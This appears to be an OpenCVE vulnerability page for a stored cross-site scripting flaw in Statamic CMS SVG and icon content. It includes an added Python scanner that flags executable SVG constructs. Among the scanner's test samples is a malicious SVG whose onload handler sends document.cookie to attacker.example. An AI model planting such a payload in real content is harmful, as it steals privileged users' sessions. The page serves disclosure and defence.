Description
Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.11 and 6.4.0, a stored XSS vulnerability in SVG and icon related components allows authenticated users with appropriate permissions to inject malicious JavaScript that executes when the content is viewed by higher-privileged users. This has been fixed in 5.73.11 and 6.4.0.
Published: 2026-02-27
Score: 8.7 High
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting leading to privilege escalation
Action: Immediate Patch
AI Analysis

Impact

Prior to versions 5.73.11 and 6.4.0, Statamic CMS allowed authenticated users with certain permissions to embed JavaScript in SVG and icon content, which was stored and later rendered without adequate sanitisation. When a higher-privileged user viewed that content, the injected script ran in that user's browser session, so an attacker holding only edit rights could act as the victim: read or modify data, hijack the session, or obtain administrative rights. The flaw is classified as CWE-79 and carries a CVSS 3.1 base score of 8.7 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N): reachable over the network, low attack complexity, low privileges required, user interaction required, changed scope, and high confidentiality and integrity impact.

Affected Systems

The vulnerability affects Statamic CMS (vendor Statamic). All 5.x releases before 5.73.11 and all 6.x releases before 6.4.0 are vulnerable.

Risk and Exploitability

Exploitation requires an authenticated account with permission to create or edit SVG or icon content, and a higher-privileged user must then view that content (CVSS UI:R), so the attack is web-based and limited to insiders or compromised low-privilege accounts. The EPSS score below 1% suggests a low likelihood of exploitation in the wild, the SSVC assessment records Exploitation: none and Automatable: no, and the flaw is not listed in the CISA KEV catalog. Against that, the high CVSS score, the SSVC Technical Impact of "total", and the privilege-escalation outcome keep the overall risk high: a single compromised editor account can be turned into administrative access. Remediation remains critical.

Generated by OpenCVE AI on April 16, 2026 at 15:06 UTC.

Remediation

Vendor fix: upgrade to Statamic 5.73.11 (5.x series) or 6.4.0 (6.x series), as stated in the GitHub advisory GHSA-5vrj-wf7v-5wr7. No vendor workaround is listed on this page.

OpenCVE Recommended Actions

  • Upgrade Statamic CMS to 5.73.11 (5.x) or 6.4.0 (6.x), or a later release
  • Until the upgrade is applied, restrict the permissions that allow creating or editing SVG and icon content to trusted administrators
  • Review existing SVG and icon entries for script elements, event-handler attributes and javascript: URLs, and remove or sanitize anything that did not come from a trusted source
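The impact section above describes an SVG icon carrying JavaScript into a privileged user's browser, and the last recommended action asks for existing SVG and icon entries to be reviewed. The script below is an added example, not code from this OpenCVE page or from the Statamic project. It parses an SVG document and reports the constructs that make it executable when rendered: script elements, on* event-handler attributes, javascript: URLs in any attribute (including SMIL animate values), data: hrefs, and elements that embed foreign content. Anything the XML parser rejects is reported as suspect, because browsers render broken SVG far more leniently than an XML parser does. The two SVG documents embedded at the bottom are constructed samples; the function names scan_svg and triage and the element list are this example's own choices, not Statamic APIs or configuration.

```python
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

# SVG elements that can execute script or embed arbitrary foreign content.
# This list is the example's own choice, not a Statamic allow/deny list.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}

# Browsers ignore ASCII control characters and whitespace inside a URL scheme,
# so strip them before looking for "javascript:" (catches "java\tscript:").
_STRIP_WS = re.compile(r"[\x00-\x20]")


def _local_name(qualified):
    """Drop the Clark-notation namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qualified.rsplit("}", 1)[-1].lower()


def scan_svg(svg_text):
    """Return a list of findings for one SVG document; an empty list means no active construct was seen."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        # A browser's HTML parser is far more lenient than an XML parser,
        # so a file we cannot parse still deserves a human look.
        return [f"unparseable SVG ({exc})"]

    findings = []
    for elem in root.iter():
        name = _local_name(elem.tag)
        if name in ACTIVE_ELEMENTS:
            findings.append(f"<{name}> element")
        for attr, value in elem.attrib.items():
            aname = _local_name(attr)  # 'xlink:href' arrives as '{...xlink}href'
            norm = _STRIP_WS.sub("", value).lower()
            if aname.startswith("on"):
                findings.append(f"event handler {aname} on <{name}>")
            if "javascript:" in norm:
                # Covers href, xlink:href and SMIL attributes such as <animate values="javascript:...">.
                findings.append(f"javascript: URL in {aname} on <{name}>")
            elif aname == "href" and norm.startswith("data:"):
                findings.append(f"data: URL in href on <{name}>")
    return findings


def triage(entries):
    """Map entry name -> findings for every SVG in a {name: svg_text} inventory that needs review."""
    return {name: found for name, svg in entries.items() if (found := scan_svg(svg))}


# Constructed samples for this example; they are not taken from the advisory.
MALICIOUS_ICON = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"
     width="24" height="24" onload="fetch('https://attacker.example/?c='+document.cookie)">
  <script>/* runs with the viewing user's session */</script>
  <a xlink:href="javascript:alert(document.domain)"><rect width="24" height="24"/></a>
</svg>"""

BENIGN_ICON = """<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
  <path d="M12 2 2 22h20z" fill="currentColor"/>
</svg>"""

if __name__ == "__main__":
    # Pass SVG file paths on the command line, or run with no arguments to scan the samples.
    inventory = {p: Path(p).read_text(encoding="utf-8") for p in sys.argv[1:]} or {
        "sample-malicious.svg": MALICIOUS_ICON,
        "sample-benign.svg": BENIGN_ICON,
    }
    for name, found in triage(inventory).items():
        print(name)
        for line in found:
            print("  -", line)
```

Run it over the SVG bodies exported from the asset containers or icon sets that low-privilege users can edit. An empty result means none of the listed constructs was found, not that the file is safe; the upgrade is the fix, and this check only helps decide which stored entries to remove or sanitize in the meantime. For large volumes of untrusted files prefer the defusedxml parser over the standard-library one.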

Advisories
Source: GitHub GHSA
ID: GHSA-5vrj-wf7v-5wr7
Title: Statamic vulnerable to privilege escalation via stored cross-site scripting
History

Thu, 05 Mar 2026 14:45:00 +0000

  First Time appeared: Statamic statamic
  CPEs: cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*
  Vendors & Products: Statamic statamic

Mon, 02 Mar 2026 20:15:00 +0000

  Metrics: ssvc {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Mon, 02 Mar 2026 12:15:00 +0000

  First Time appeared: Statamic; Statamic cms
  Vendors & Products: Statamic; Statamic cms

Fri, 27 Feb 2026 22:45:00 +0000

  Description: Statamic is a Laravel and Git powered content management system (CMS). Prior to versions 5.73.11 and 6.4.0, a stored XSS vulnerability in SVG and icon related components allows authenticated users with appropriate permissions to inject malicious JavaScript that executes when viewed by higher-privileged users. This has been fixed in 5.73.11 and 6.4.0.
  Title: Statamic vulnerable to privilege escalation via stored cross-site scripting
  Weaknesses: CWE-79
  References
  Metrics: cvssV3_1 {'score': 8.7, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N'}

MITRE

Status: PUBLISHED
Assigner: GitHub_M
Published:
Updated: 2026-03-02T19:39:23.113Z
Reserved: 2026-02-27T15:54:05.137Z
Link: CVE-2026-28426

Vulnrichment

Updated: 2026-03-02T19:38:58.424Z

NVD

Status: Analyzed
Published: 2026-02-27T23:16:05.780
Modified: 2026-03-05T14:32:00.283
Link: CVE-2026-28426

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-16T15:15:39Z

Weaknesses